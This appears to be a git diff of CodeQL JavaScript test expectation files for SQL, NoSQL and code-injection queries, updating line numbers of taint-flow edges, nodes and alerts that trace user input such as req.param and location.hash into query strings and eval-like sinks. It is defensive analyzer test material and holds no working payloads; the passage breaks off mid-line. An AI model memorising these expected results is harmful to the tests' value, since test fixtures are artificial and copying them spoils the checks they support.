mongoose.js:112:28:112:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:113:18:113:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:113:18:113:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:114:22:114:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:114:22:114:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:115:21:115:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:115:21:115:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:116:16:116:26 | { _id: id } | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:116:16:116:26 | { _id: id } | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:122:30:122:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:122:30:122:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongooseJsonParse.js:22:19:22:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:22:19:22:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | | mongooseModelClient.js:11:16:11:24 | { id: v } | mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:11:16:11:24 | { id: v } | This query object depends on a $@. | mongooseModelClient.js:10:22:10:29 | req.body | user-provided value | | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | This query object depends on a $@. | mongooseModelClient.js:12:22:12:29 | req.body | user-provided value | | mysql.js:15:18:15:65 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:15:18:15:65 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | @@ -751,7 +751,7 @@ subpaths | redis.js:43:27:43:29 | key | redis.js:38:17:38:24 | req.body | redis.js:43:27:43:29 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | | redis.js:46:34:46:36 | key | redis.js:38:17:38:24 | req.body | redis.js:46:34:46:36 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | | socketio.js:11:12:11:53 | `INSERT ... andle}` | socketio.js:10:25:10:30 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | This query string depends on a $@. | socketio.js:10:25:10:30 | handle | user-provided value | -| tst2.js:9:27:9:84 | "select ... d + "'" | tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:9:66:9:78 | req.params.id | user-provided value | +| tst2.js:8:27:8:84 | "select ... d + "'" | tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:8:66:8:78 | req.params.id | user-provided value | | tst3.js:9:14:9:19 | query1 | tst3.js:8:16:8:34 | req.params.category | tst3.js:9:14:9:19 | query1 | This query string depends on a $@. | tst3.js:8:16:8:34 | req.params.category | user-provided value | | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | This query string depends on a $@. | tst4.js:8:46:8:60 | $routeParams.id | user-provided value | | tst.js:10:10:10:64 | 'SELECT ... d + '"' | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | This query string depends on a $@. | tst.js:10:46:10:58 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected index e536c54dbd2f..59a5381f2cd2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected @@ -2,14 +2,14 @@ edges | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | provenance | | | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | @@ -28,17 +28,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | @@ -61,24 +61,24 @@ nodes | angularjs.js:47:16:47:30 | location.search | semmle.label | location.search | | angularjs.js:50:22:50:36 | location.search | semmle.label | location.search | | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | @@ -102,25 +102,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | @@ -147,16 +147,16 @@ subpaths | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | This code execution depends on a $@. | angularjs.js:47:16:47:30 | location.search | user-provided value | | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | This code execution depends on a $@. | angularjs.js:50:22:50:36 | location.search | user-provided value | | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | This code execution depends on a $@. | angularjs.js:53:32:53:46 | location.search | user-provided value | -| express.js:7:24:7:69 | "return ... + "];" | express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | This code execution depends on a $@. | express.js:7:44:7:62 | req.param("wobble") | user-provided value | -| express.js:9:34:9:79 | "return ... + "];" | express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | This code execution depends on a $@. | express.js:9:54:9:72 | req.param("wobble") | user-provided value | -| express.js:12:8:12:53 | "return ... + "];" | express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | This code execution depends on a $@. | express.js:12:28:12:46 | req.param("wobble") | user-provided value | -| express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | This code execution depends on a $@. | express.js:15:22:15:54 | req.par ... ction") | user-provided value | -| express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | This code execution depends on a $@. | express.js:17:30:17:53 | req.par ... cript") | user-provided value | -| express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | This code execution depends on a $@. | express.js:19:37:19:70 | req.par ... odule") | user-provided value | -| express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:21:19:21:48 | req.par ... ntext") | user-provided value | -| express.js:27:34:27:38 | taint | express.js:26:17:26:35 | req.param("wobble") | express.js:27:34:27:38 | taint | This code execution depends on a $@. | express.js:26:17:26:35 | req.param("wobble") | user-provided value | -| express.js:43:15:43:19 | taint | express.js:34:17:34:35 | req.param("wobble") | express.js:43:15:43:19 | taint | This code execution depends on a $@. | express.js:34:17:34:35 | req.param("wobble") | user-provided value | -| express.js:50:10:50:12 | msg | express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | This code execution depends on a $@. | express.js:49:30:49:32 | msg | user-provided value | +| express.js:6:24:6:69 | "return ... + "];" | express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | This code execution depends on a $@. | express.js:6:44:6:62 | req.param("wobble") | user-provided value | +| express.js:7:34:7:79 | "return ... + "];" | express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | This code execution depends on a $@. | express.js:7:54:7:72 | req.param("wobble") | user-provided value | +| express.js:9:8:9:53 | "return ... + "];" | express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | This code execution depends on a $@. | express.js:9:28:9:46 | req.param("wobble") | user-provided value | +| express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... ction") | This code execution depends on a $@. | express.js:11:22:11:54 | req.par ... ction") | user-provided value | +| express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | This code execution depends on a $@. | express.js:12:30:12:53 | req.par ... cript") | user-provided value | +| express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | This code execution depends on a $@. | express.js:13:37:13:70 | req.par ... odule") | user-provided value | +| express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:14:19:14:48 | req.par ... ntext") | user-provided value | +| express.js:20:34:20:38 | taint | express.js:19:17:19:35 | req.param("wobble") | express.js:20:34:20:38 | taint | This code execution depends on a $@. | express.js:19:17:19:35 | req.param("wobble") | user-provided value | +| express.js:36:15:36:19 | taint | express.js:27:17:27:35 | req.param("wobble") | express.js:36:15:36:19 | taint | This code execution depends on a $@. | express.js:27:17:27:35 | req.param("wobble") | user-provided value | +| express.js:43:10:43:12 | msg | express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | This code execution depends on a $@. | express.js:42:30:42:32 | msg | user-provided value | | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value | | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. | module.js:11:17:11:30 | req.query.code | user-provided value | | react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | @@ -176,17 +176,17 @@ subpaths | template-sinks.js:31:19:31:25 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:31:19:31:25 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | | template-sinks.js:32:16:32:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:32:16:32:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | | template-sinks.js:33:17:33:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:33:17:33:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| tst.js:2:6:2:83 | documen ... t=")+8) | tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:2:6:2:27 | documen ... on.href | user-provided value | -| tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:5:12:5:33 | documen ... on.hash | user-provided value | -| tst.js:14:10:14:74 | documen ... , "$1") | tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:14:10:14:33 | documen ... .search | user-provided value | -| tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:17:21:17:42 | documen ... on.hash | user-provided value | -| tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:20:30:20:51 | documen ... on.hash | user-provided value | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:6:23:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:23:11:23:32 | documen ... on.hash | user-provided value | -| tst.js:26:26:26:53 | locatio ... ring(1) | tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:26:26:26:40 | location.search | user-provided value | -| tst.js:31:18:31:23 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:31:18:31:23 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:33:14:33:19 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:33:14:33:19 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:35:28:35:33 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:35:28:35:33 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:37:33:37:38 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:37:33:37:38 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | +| tst.js:1:6:1:83 | documen ... t=")+8) | tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:1:6:1:27 | documen ... on.href | user-provided value | +| tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:3:12:3:33 | documen ... on.hash | user-provided value | +| tst.js:11:10:11:74 | documen ... , "$1") | tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:11:10:11:33 | documen ... .search | user-provided value | +| tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:13:21:13:42 | documen ... on.hash | user-provided value | +| tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:15:30:15:51 | documen ... on.hash | user-provided value | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:6:17:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:17:11:17:32 | documen ... on.hash | user-provided value | +| tst.js:19:26:19:53 | locatio ... ring(1) | tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:19:26:19:40 | location.search | user-provided value | +| tst.js:24:18:24:23 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:24:18:24:23 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:26:14:26:19 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:26:14:26:19 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:28:28:28:33 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:28:28:28:33 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:30:33:30:38 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:30:33:30:38 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | This code execution depends on a $@. | webix/webix.html:3:16:3:37 | documen ... on.hash | user-provided value | | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:4:26:4:47 | documen ... on.hash | user-provided value | | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:5:47:5:68 | documen ... on.hash | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected index 2be7dc659f29..ba973943e124 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected @@ -3,14 +3,14 @@ edges | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | | eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | @@ -29,17 +29,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 